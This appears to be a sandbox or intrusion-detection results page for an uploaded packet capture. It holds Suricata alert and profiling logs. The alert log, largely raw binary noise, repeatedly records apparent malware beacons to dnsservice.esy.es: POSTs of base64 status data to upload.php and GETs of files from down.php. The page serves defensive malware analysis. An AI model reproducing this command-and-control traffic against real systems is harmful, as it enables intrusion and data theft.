Filename: 1a0281a7d09b36c1d94e302f14eafb2ca7144a6cee42d89af4604858683afef5.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etpro-all
Runtime: 28.8805599213 seconds
Hash: cf556455534924bd14168c1c670054f9
Uploaded: 1565698245

Logfiles


unified2.alert.1565698272 - (125419 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
4UN*úf
]¼ MP…UNiE[¯…
]¼ MPPĨPOST /./software1/upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Content-Length: 54
Connection: Keep-Alive
Cache-Control: no-cache

id=CQUGKAWELS&subject=status&data=MDguMTEtMjAuMzcuMDA=4	ÁµÄ
]¼ MPþ	ÁâEÔ°
]¼ MPP½
GET /./software1/down.php?file=CQUGKAWELS HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Connection: Keep-Alive

4Êö*úf
]¼ MP…ÊöiE[¯…
]¼ MPPÄ¢POST /./software1/upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Content-Length: 54
Connection: Keep-Alive
Cache-Control: no-cache

id=CQUGKAWELS&subject=status&data=MDguMTEtMjAuMzcuMDE=4”€µÄ
]¼ MPþ”€âEÔ°
]¼ MPP½GET /./software1/down.php?file=CQUGKAWELS HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Connection: Keep-Alive

4…*úf
]¼ MP……iE[¯…
]¼ MPPÄ POST /./software1/upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Content-Length: 54
Connection: Keep-Alive
Cache-Control: no-cache

id=CQUGKAWELS&subject=status&data=MDguMTEtMjAuMzcuMDE=4¼kµÄ
]¼ MPþ¼kâEÔ°
]¼ MPP½	GET /./software1/down.php?file=CQUGKAWELS HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Connection: Keep-Alive

4
­*úf
]¼ MP…
­iE[¯…
]¼ MPPĞPOST /./software1/upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Content-Length: 54
Connection: Keep-Alive
Cache-Control: no-cache

id=CQUGKAWELS&subject=status&data=MDguMTEtMjAuMzcuMDE=4êäµÄ
]¼ M PþêäâEÔ°
]¼ M PP½GET /./software1/down.php?file=CQUGKAWELS HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Connection: Keep-Alive

4	•ð*úf
]¼ M!P…	•ðiE[¯…
]¼ M!PPĘPOST /./software1/upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Content-Length: 54
Connection: Keep-Alive
Cache-Control: no-cache

id=CQUGKAWELS&subject=status&data=MDguMTEtMjAuMzcuMDI=4
Ž—µÄ
]¼ M"Pþ
Ž—âEÔ°
]¼ M"PP½GET /./software1/down.php?file=CQUGKAWELS HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Connection: Keep-Alive

4ö6*úf
]¼ M#P…ö6iE[¯…
]¼ M#PPĖPOST /./software1/upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Content-Length: 54
Connection: Keep-Alive
Cache-Control: no-cache

id=CQUGKAWELS&subject=status&data=MDguMTEtMjAuMzcuMDI=4
[“µÄ
]¼ M$Pþ
[“âEÔ°
]¼ M$PP½GET /./software1/down.php?file=CQUGKAWELS HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Connection: Keep-Alive

4

Å}*úf
]¼ M%P…

Å}iE[¯…
]¼ M%PPĐPOST /./software1/upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Content-Length: 54
Connection: Keep-Alive
Cache-Control: no-cache

id=CQUGKAWELS&subject=status&data=MDguMTEtMjAuMzcuMDM=4…nµÄ
]¼ M&Pþ…nâEÔ°
]¼ M&PP½GET /./software1/down.php?file=CQUGKAWELS HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Connection: Keep-Alive

4Î!*úf
]¼ M'P…Î!iE[¯…
]¼ M'PPĎPOST /./software1/upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Content-Length: 54
Connection: Keep-Alive
Cache-Control: no-cache

id=CQUGKAWELS&subject=status&data=MDguMTEtMjAuMzcuMDM=4>µÄ
]¼ M(Pþ>âEÔ°
]¼ M(PP¼ÿGET /./software1/down.php?file=CQUGKAWELS HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Connection: Keep-Alive

4
åÙ*úf
]¼ M)P…
åÙiE[¯…
]¼ M)PPČPOST /./software1/upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Content-Length: 54
Connection: Keep-Alive
Cache-Control: no-cache

id=CQUGKAWELS&subject=status&data=MDguMTEtMjAuMzcuMDM=49mµÄ
]¼ M*Pþ9mâEÔ°
]¼ M*PP¼ýGET /./software1/down.php?file=CQUGKAWELS HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Connection: Keep-Alive

4ëP*úf
]¼ M+P…ëPiE[¯…
]¼ M+PPĆPOST /./software1/upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Content-Length: 54
Connection: Keep-Alive
Cache-Control: no-cache

id=CQUGKAWELS&subject=status&data=MDguMTEtMjAuMzcuMDQ=4%£µÄ
]¼ M,Pþ%£âEÔ°
]¼ M,PP¼ûGET /./software1/down.php?file=CQUGKAWELS HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Connection: Keep-Alive

4…×*úf
]¼ M-P……×iE[¯…
]¼ M-PPĄPOST /./software1/upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Content-Length: 54
Connection: Keep-Alive
Cache-Control: no-cache

id=CQUGKAWELS&subject=status&data=MDguMTEtMjAuMzcuMDQ=4‹µÄ
]¼ M.Pþ‹âEÔ°
]¼ M.PP¼ùGET /./software1/down.php?file=CQUGKAWELS HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Connection: Keep-Alive

4Ïú*úf
]¼ M/P…ÏúiE[¯…
]¼ M/PPÄ~POST /./software1/upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Content-Length: 54
Connection: Keep-Alive
Cache-Control: no-cache

id=CQUGKAWELS&subject=status&data=MDguMTEtMjAuMzcuMDU=4{cµÄ
]¼ M0Pþ{câEÔ°
]¼ M0PP¼÷GET /./software1/down.php?file=CQUGKAWELS HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Connection: Keep-Alive

4kv*úf
]¼ M1P…kviE[¯…
]¼ M1PPÄ|POST /./software1/upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Content-Length: 54
Connection: Keep-Alive
Cache-Control: no-cache

id=CQUGKAWELS&subject=status&data=MDguMTEtMjAuMzcuMDU=4¥‹µÄ
]¼ M2Pþ¥‹âEÔ°
]¼ M2PP¼õGET /./software1/down.php?file=CQUGKAWELS HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Connection: Keep-Alive

4&ê*úf
]¼ M3P…&êiE[¯…
]¼ M3PPÄzPOST /./software1/upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Content-Length: 54
Connection: Keep-Alive
Cache-Control: no-cache

id=CQUGKAWELS&subject=status&data=MDguMTEtMjAuMzcuMDU=4µÄ
]¼ M4PþâEÔ°
]¼ M4PP¼óGET /./software1/down.php?file=CQUGKAWELS HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Connection: Keep-Alive

4Ò*úf
]¼ M5P…ÒiE[¯…
]¼ M5PPÄtPOST /./software1/upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Content-Length: 54
Connection: Keep-Alive
Cache-Control: no-cache

id=CQUGKAWELS&subject=status&data=MDguMTEtMjAuMzcuMDY=4Q嵀
]¼ M6PþQÂâEÔ°
]¼ M6PP¼ñGET /./software1/down.php?file=CQUGKAWELS HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Connection: Keep-Alive

4	Üt*úf
]¼ M7P…	ÜtiE[¯…
]¼ M7PPÄrPOST /./software1/upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Content-Length: 54
Connection: Keep-Alive
Cache-Control: no-cache

id=CQUGKAWELS&subject=status&data=MDguMTEtMjAuMzcuMDY=4 
,еÄ
]¼ M8Pþ 
,ÐâEÔ°
]¼ M8PP¼ïGET /./software1/down.php?file=CQUGKAWELS HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Connection: Keep-Alive

4!1Î*úf
]¼ M9P…!1ÎiE[¯…
]¼ M9PPÄfPOST /./software1/upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Content-Length: 54
Connection: Keep-Alive
Cache-Control: no-cache

id=CQUGKAWELS&subject=status&data=MDguMTEtMjAuMzcuMDc=4"l뵀
]¼ M:Pþ"lÎâEÔ°
]¼ M:PP¼íGET /./software1/down.php?file=CQUGKAWELS HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Connection: Keep-Alive

4#P*úf
]¼ M;P…#PiE[¯…
]¼ M;PPÄdPOST /./software1/upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Content-Length: 54
Connection: Keep-Alive
Cache-Control: no-cache

id=CQUGKAWELS&subject=status&data=MDguMTEtMjAuMzcuMDc=4$
U¾µÄ
]¼ M<Pþ$
U¾âEÔ°
]¼ M<PP¼ëGET /./software1/down.php?file=CQUGKAWELS HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Connection: Keep-Alive

4%
“,*úf
]¼ M=P…%
“,iE[¯…
]¼ M=PPÄ^POST /./software1/upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Content-Length: 54
Connection: Keep-Alive
Cache-Control: no-cache

id=CQUGKAWELS&subject=status&data=MDguMTEtMjAuMzcuMDg=4&¯DµÄ
]¼ M>Pþ&¯DâEÔ°
]¼ M>PP¼éGET /./software1/down.php?file=CQUGKAWELS HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Connection: Keep-Alive

4'˜è*úf
]¼ M?P…'˜èiE[¯…
]¼ M?PPÄ\POST /./software1/upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Content-Length: 54
Connection: Keep-Alive
Cache-Control: no-cache

id=CQUGKAWELS&subject=status&data=MDguMTEtMjAuMzcuMDg=4(’¾µÄ
]¼ M@Pþ(’¾âEÔ°
]¼ M@PP¼çGET /./software1/down.php?file=CQUGKAWELS HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Connection: Keep-Alive

4)
Ч*úf
]¼ MAP…)
ЧiE[¯…
]¼ MAPPÄZPOST /./software1/upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Content-Length: 54
Connection: Keep-Alive
Cache-Control: no-cache

id=CQUGKAWELS&subject=status&data=MDguMTEtMjAuMzcuMDg=4*
ÆõµÄ
]¼ MBPþ*
ÆõâEÔ°
]¼ MBPP¼åGET /./software1/down.php?file=CQUGKAWELS HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Connection: Keep-Alive

4+°

This file has been truncated. Go here to download in full.


packet_stats.log - (15789 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       1            37         33897084     3113329168    1020388356         37.8b    0.64
 IPv4       2             2         24990410       34031538      29510974         59.0m    0.00
 IPv4       6          3221         10282848     3721642830    1794037455       5778.6b   98.70
 IPv4      17            51          3338240     3113195432     749237557         38.2b    0.65
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       1            37           115230         366196        139055          5.1m    0.12
TMM_FLOWWORKER              IPv4       2             2           146804         166364        156584        313.2k    0.01
TMM_FLOWWORKER              IPv4       6          3221           115392       38382922       1248220          4.0b   96.36
TMM_FLOWWORKER              IPv4      17            51           269596       18051572        945349         48.2m    1.16
TMM_RECEIVEPCAPFILE         IPv4       1            37             4450           5930          4759        176.1k    0.00
TMM_RECEIVEPCAPFILE         IPv4       2             2             4492           4838          4665          9.3k    0.00
TMM_RECEIVEPCAPFILE         IPv4       6          2899             4430       20883396         12634         36.6m    0.88
TMM_RECEIVEPCAPFILE         IPv4      17            51             4448           5986          4833        246.5k    0.01
TMM_DECODEPCAPFILE          IPv4       1            37             4650          21494          5669        209.8k    0.01
TMM_DECODEPCAPFILE          IPv4       2             2             4954           5836          5395         10.8k    0.00
TMM_DECODEPCAPFILE          IPv4       6          2899             4552       15517804         20953         60.7m    1.46
TMM_DECODEPCAPFILE          IPv4      17            51             4616          28624          5698        290.6k    0.01

Flow Worker            IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       1            37             4826           8052          5636        208.6k  0.01  
flow                    IPv4       6          2899             4744         260646          7338         21.3m  0.56  
flow                    IPv4      17            51             4814          42120          8147        415.5k  0.01  
stream                  IPv4       6          3221             5264         593520         38757        124.8m  3.31  
app-layer               IPv4      17            51             4434          61628          9551        487.1k  0.01  
detect                  IPv4       1            37            96284         333114        117254          4.3m  0.12  
detect                  IPv4       2             2           136360         156826        146593        293.2k  0.01  
detect                  IPv4       6          3221            77024       34166118       1107684          3.6b  94.73 
detect                  IPv4      17            51           241260        7872934        554719         28.3m  0.75  
tcp-prune               IPv4       6          3221             4446         267620          5686         18.3m  0.49  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6           644             5168         108324         10462          6.7m  98.32 
dns                     IPv4      17             7            10920          24710         16408        114.9k  1.68  
Proto detect            IPv4      17            11             4980          34464         14036        154.4k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_ALERT_FAST           IPv4       6           322            56806         529608         96873         31.2m  15.92 
LOGGER_UNIFIED2             IPv4       6           322            47564         303018         62706         20.2m  10.30 
LOGGER_JSON_ALERT           IPv4       6           322            73828       24539640        216033         69.6m  35.49 
LOGGER_JSON_DNS             IPv4      17             4           112820       17225924       4463820         17.9m  9.11  
LOGGER_JSON_HTTP            IPv4       6           322            43938         294132         62472         20.1m  10.26 
LOGGER_JSON_FILE            IPv4       6           483            47068         702838         76745         37.1m  18.91 

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       1            37             4946          34624          9395       347.6k  0.16  
payload                           IPv4       6          1288             4460         284404         35224        45.4m  20.36 
payload                           IPv4      17            51             6212         145170         40762         2.1m  0.93  
stream                            IPv4       6          1288             4434        7553796         39371        50.7m  22.75 
http_uri                          IPv4       6           322            17822         141500         31223        10.1m  4.51  
http_request_line                 IPv4       6           322             8216          40304         10622         3.4m  1.53  
http_client_body                  IPv4       6           322             4942         104188         22918         7.4m  3.31  
http_header (request)             IPv4       6           322            41988         218130         79251        25.5m  11.45 
http_header (request trailer)     IPv4       6           322             4478          31170          5102         1.6m  0.74  
http_header_names (request)       IPv4       6           322            15914          69344         27156         8.7m  3.92  
http_accept (request)             IPv4       6           322             5214          25414          6320         2.0m  0.91  
http_referer (request)            IPv4       6           322             4866          22264          5559         1.8m  0.80  
http_content_len (request)        IPv4       6           322             4980          45344          6813         2.2m  0.98  
http_content_type (request)       IPv4       6           322             4992          46740         11306         3.6m  1.63  
http_protocol (request)           IPv4       6           322             5900         112864          8572         2.8m  1.24  
http_start (request)              IPv4       6           322            12620         161304         19702         6.3m  2.85  
http_raw_header (request)         IPv4       6           322            16530         196120         22028         7.1m  3.18  
http_method                       IPv4       6           322             8000          50200         10339         3.3m  1.49  
http_cookie (request)             IPv4       6           322             4914          27518          5683         1.8m  0.82  
http_raw_uri                      IPv4       6           322             8802          56208         11999         3.9m  1.73  
http_user_agent                   IPv4       6           322            24970         167314         36359        11.7m  5.25  
http_host                         IPv4       6           322             7764         127198         10993         3.5m  1.59  
dns_query                         IPv4      17             2            16912          17644         17278        34.6k  0.02  
http_response_line                IPv4       6           322             4976          36590          6899         2.2m  1.00  
http_header (response)            IPv4       6           322             7776          71648         11167         3.6m  1.61  
http_header (response trailer)    IPv4       6           322             4456          49076          4961         1.6m  0.72  
http_content_type (response)      IPv4       6           322             4952          84610          6084         2.0m  0.88  
http_raw_header (response)        IPv4       6           322            11080         430722         13257         4.3m  1.92  
http_cookie (response)            IPv4       6           322             4678         426804          6702         2.2m  0.97  
http_stat_code                    IPv4       6           322             4626          21222          5143         1.7m  0.74  
Total                             IPv4                 10716                                         20799       222.9m

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
PROF_DETECT_IPONLY          IPv4       1             2            42054          47288         44671         89.3k  0.00  
PROF_DETECT_IPONLY          IPv4       2             2            52700          73160         62930        125.9k  0.00  
PROF_DETECT_IPONLY          IPv4       6           645            15452         298358         53009         34.2m  0.64  
PROF_DETECT_IPONLY          IPv4      17            10            30190         186540         74786        747.9k  0.01  
PROF_DETECT_RULES           IPv4       1            37             4434           5946          4757        176.0k  0.00  
PROF_DETECT_RULES           IPv4       2             2             4448           4482          4465          8.9k  0.00  
PROF_DETECT_RULES           IPv4       6          3221             4444       33389148        878083          2.8b  53.03 
PROF_DETECT_RULES           IPv4      17            51            63234        7688950        382054         19.5m  0.37  
PROF_DETECT_STATEFUL_START    IPv4       6           966             9030       27458370       1596203          1.5b  28.91 
PROF_DETECT_STATEFUL_CONT    IPv4       1            37             4414          26650          5847        216.4k  0.00  
PROF_DETECT_STATEFUL_CONT    IPv4       2             2             4454           4480          4467          8.9k  0.00  
PROF_DETECT_STATEFUL_CONT    IPv4       6          3221             4398         356308         10235         33.0m  0.62  
PROF_DETECT_STATEFUL_CONT    IPv4      17            51             4414          51144          6767        345.1k  0.01  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6          1932             4458          58384          5077          9.8m  0.18  
PROF_DETECT_STATEFUL_UPDATE    IPv4      17             4             4560           5556          5182         20.7k  0.00  
PROF_DETECT_PREFILTER       IPv4       1            37            32196         223452         43039          1.6m  0.03  
PROF_DETECT_PREFILTER       IPv4       2             2            13840          13998         13919         27.8k  0.00  
PROF_DETECT_PREFILTER       IPv4       6          3221            13580       21632700        128400        413.6m  7.75  
PROF_DETECT_PREFILTER       IPv4      17            51            42798         193954         84332          4.3m  0.08  
PROF_DETECT_PF_PAYLOAD      IPv4       1            37            14002         181244         22726        840.9k  0.02  
PROF_DETECT_PF_PAYLOAD      IPv4       6          1288            26838        7573370         90748        116.9m  2.19  
PROF_DETECT_PF_PAYLOAD      IPv4      17            51            15448         154090         50503          2.6m  0.05  
PROF_DETECT_PF_TX           IPv4       6          1932             4580       21465060        104090        201.1m  3.77  
PROF_DETECT_PF_TX           IPv4      17             2            27628          28386         28007         56.0k  0.00  
PROF_DETECT_PF_SORT1        IPv4       6          1288             4576         124366          9472         12.2m  0.23  
PROF_DETECT_PF_SORT1        IPv4      17            51             4714          22080          6617        337.5k  0.01  
PROF_DETECT_PF_SORT2        IPv4       1            37             4412          28048          5215        193.0k  0.00  
PROF_DETECT_PF_SORT2        IPv4       2             2             4416           4708          4562          9.1k  0.00  
PROF_DETECT_PF_SORT2        IPv4       6          3221             4414        4254196          7567         24.4m  0.46  
PROF_DETECT_PF_SORT2        IPv4      17            51             4494          28392          6297        321.2k  0.01  
PROF_DETECT_NONMPMLIST      IPv4       1            37             4450          27842          6162        228.0k  0.00  
PROF_DETECT_NONMPMLIST      IPv4       2             2             4664           4804          4734          9.5k  0.00  
PROF_DETECT_NONMPMLIST      IPv4       6          3221             4456         260598          5614         18.1m  0.34  
PROF_DETECT_NONMPMLIST      IPv4      17            51             4436          22732          5545        282.8k  0.01  
PROF_DETECT_ALERT           IPv4       1            37             4422           5514          4561        168.8k  0.00  
PROF_DETECT_ALERT           IPv4       2             2             4482           4512          4497          9.0k  0.00  
PROF_DETECT_ALERT           IPv4       6          3221             4410        6877716          7872         25.4m  0.48  
PROF_DETECT_ALERT           IPv4      17            51             4432          27442          5605        285.9k  0.01  
PROF_DETECT_CLEANUP         IPv4       1            37             4428           6010          4649        172.0k  0.00  
PROF_DETECT_CLEANUP         IPv4       2             2             4452           4470          4461          8.9k  0.00  
PROF_DETECT_CLEANUP         IPv4       6          3221             4462         286878          5939         19.1m  0.36  
PROF_DETECT_CLEANUP         IPv4      17            51             4426          18000          5296        270.1k  0.01  
PROF_DETECT_GETSGH          IPv4       1            37             4450          29650          5553        205.5k  0.00  
PROF_DETECT_GETSGH          IPv4       2             2             4730           4974          4852          9.7k  0.00  
PROF_DETECT_GETSGH          IPv4       6          3221             4424         364584          6725         21.7m  0.41  
PROF_DETECT_GETSGH          IPv4      17            51             4422          66558          8246        420.6k  0.01  


suricata-4.0.0-etpro-all-perf.txt-2019-08-13-T-12-11-14-08132019.1210-1a0281a7d09b36c1d94e302f14eafb2ca7144a6cee42d89af4604858683afef5.pcap.txt - (33750 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
  --------------------------------------------------------------------------
  Date: 8/13/2019 -- 12:11:13. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2820851      1        5        45633992     1.79   322      0        23899412    141720.47   0.00        141720.47  
  2        2021418      1        9        45354228     1.78   322      0        22787700    140851.64   0.00        140851.64  
  3        2816928      1        3        42865474     1.68   322      0        19524338    133122.59   0.00        133122.59  
  4        2816713      1        2        17978774     0.70   161      0        11599448    111669.40   0.00        111669.40  
  5        2816526      1        13       27400460     1.07   322      0        10757338    85094.60    0.00        85094.60   
  6        2816924      1        4        26825276     1.05   322      0        10514772    83308.31    0.00        83308.31   
  7        2816910      1        2        40845768     1.60   322      0        9667256     126850.21   0.00        126850.21  
  8        2008116      1        4        7807494      0.31   44       0        7555176     177443.05   0.00        177443.05  
  9        2017259      1        12       23605350     0.93   161      0        7026550     146617.08   0.00        146617.08  
  10       2021718      1        4        17410678     0.68   161      0        7004694     108140.86   0.00        108140.86  
  11       2811826      1        7        16722094     0.66   161      0        7001362     103863.94   0.00        103863.94  
  12       2018452      1        15       26144870     1.02   322      0        5364402     81195.25    0.00        81195.25   
